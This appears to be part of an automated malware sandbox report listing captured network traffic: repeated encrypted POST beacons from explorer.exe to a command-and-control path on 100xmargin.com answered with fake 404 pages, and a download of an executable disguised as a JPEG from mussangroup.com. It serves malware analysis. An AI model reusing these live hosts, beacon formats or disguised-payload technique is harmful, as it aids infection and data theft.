Aug 19, 2024 09:28:34.400731087 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crtlcijemvyx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: 100xmargin.com
Aug 19, 2024 09:28:34.400751114 CEST	269	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 29 04 e8 8f Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu)aJD[kK_W/Nap`B(ADdlA#Qa8<F' z#UPm}8U^G2x>MisG~*G7l
Aug 19, 2024 09:28:35.696758032 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49761	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:48.949852943 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eodueolaaev.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: 100xmargin.com
Aug 19, 2024 09:28:48.949894905 CEST	343	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1b 6b 2c 90 f4 76 0b 75 7d 14 c0 a6 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA ,[k,vu}eUQPBa\|Y1*;4Eub];B`-/CIkn1PYO5E9gzd(^HV\ +p:xdsYq<
Aug 19, 2024 09:28:50.137999058 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:50.148668051 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://naeduqoyqokl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: 100xmargin.com
Aug 19, 2024 09:28:50.148682117 CEST	278	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 50 5c aa e9 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuP\BQau'Rm.ZwrO6foGeHYUJWABO"DK\|6o/"=^-c,),6U^$MU0<2A#
Aug 19, 2024 09:28:51.211571932 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:51.221196890 CEST	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wipabeoxyiindo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: 100xmargin.com
Aug 19, 2024 09:28:51.221229076 CEST	126	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 48 31 b6 f7 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuH1n6~iV4sWEMv>y8
Aug 19, 2024 09:28:52.286766052 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49773	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:29:59.541838884 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jehaldxqvvea.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: 100xmargin.com
Aug 19, 2024 09:29:59.541858912 CEST	306	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 0b d0 b9 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu,]ED8[An{+~Z[)4+NT.#$1Y6C4Ng1DD!LVN2ufi:#[{oJY0
Aug 19, 2024 09:30:00.812921047 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:06.285881042 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://urtrdmlxhbyurook.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: 100xmargin.com
Aug 19, 2024 09:30:06.285909891 CEST	165	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 38 b1 83 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vuR8(zCQ`F^-6r}w\|[QB;cVCi#,P+(
Aug 19, 2024 09:30:07.367075920 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:12.073133945 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lliabotheqxncloc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 332 Host: 100xmargin.com
Aug 19, 2024 09:30:12.073163986 CEST	332	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 24 e5 b9 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vua$ZqB`7LQYyRE6f%7S7dl,"EvVE1r q5'rl5GJ&u)-AMe?IoqXm\|MRd
Aug 19, 2024 09:30:13.154412031 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:17.940922976 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kjgfasvdoxofbfqb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: 100xmargin.com
Aug 19, 2024 09:30:17.940973043 CEST	166	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 23 cf 8e Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vuu#fasPyed%1cppCsOI=@02&D3j(9>&f
Aug 19, 2024 09:30:19.028424025 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49777	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:25.017790079 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://djwjxjenyqhjtklo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: 100xmargin.com
Aug 19, 2024 09:30:25.017823935 CEST	330	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 1b ba aa Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vuU^,cu3?Mu-^,!y-F]^r9+ta~QA$lN4":AR(q8HD.&cJc z"H_1
Aug 19, 2024 09:30:26.083509922 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:31.509370089 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xmrxamwxfvkybcwf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: 100xmargin.com
Aug 19, 2024 09:30:31.509401083 CEST	368	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 14 dd e5 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu)~\P]txA`W_0su"pSr\8K?^Bo9=+N;&Dq?{xwEM#1QBCZU<X\|
Aug 19, 2024 09:30:32.576231003 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	61794	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:43.063760996 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://docehetfrtjrb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: 100xmargin.com
Aug 19, 2024 09:30:43.063788891 CEST	279	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 5b dd bf Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vuO[jsj~EN]D2d2).=s$0=1{14f8bpw,QML\Q}.R#&ZOA#mlb?xL*
Aug 19, 2024 09:30:44.707561970 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	61795	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:49.552100897 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qnwpuvrofdmbcpnt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: 100xmargin.com
Aug 19, 2024 09:30:49.552155972 CEST	180	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 36 dd e0 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu]6}z}J%2l$!Jg&$^J%T2'IpIv`(;Z7
Aug 19, 2024 09:30:51.114315987 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	61796	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:30:56.409737110 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hhjnintgajpt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: 100xmargin.com
Aug 19, 2024 09:30:56.409764051 CEST	272	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2a 02 f0 e3 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu*HBTO\>p]d`2I#E$SIBe:=i)T;WgV~)wU{I#A0avP$F>HHX5-
Aug 19, 2024 09:30:57.877599955 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:30:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	61797	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:31:02.364511967 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jxrfghxdpppsidad.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: 100xmargin.com
Aug 19, 2024 09:31:02.364536047 CEST	322	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 05 e6 f7 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu5sGLqlVbF3'{"ZVp^55@$5dp+@<<jT&YDQiQrC.CGb LnJ!-N\|
Aug 19, 2024 09:31:03.858622074 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:31:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	61798	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:31:09.143001080 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qjklivdfirkmv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: 100xmargin.com
Aug 19, 2024 09:31:09.143057108 CEST	270	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 2e c0 ec Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu{.s[A\|DaQsSz?*UXm@kYT$(@=ILa#)`{L?s&B\|4f`5wZ?zNi'rZM'
Aug 19, 2024 09:31:11.757477045 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:31:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49750	185.149.100.242	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:28:23 UTC	179	OUT	GET /wp-content/images/pic2.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-08-19 07:28:24 UTC	451	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Mon, 26 Aug 2024 07:28:23 GMT content-type: image/jpeg last-modified: Fri, 02 Aug 2024 22:42:26 GMT accept-ranges: bytes content-length: 2097152 date: Mon, 19 Aug 2024 07:28:23 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-08-19 07:28:24 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 bf 60 ad 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 d8 1d 00 00 fc 1f 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 26 00 00 04 00 00 dc 08 20 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd`f.`@& `
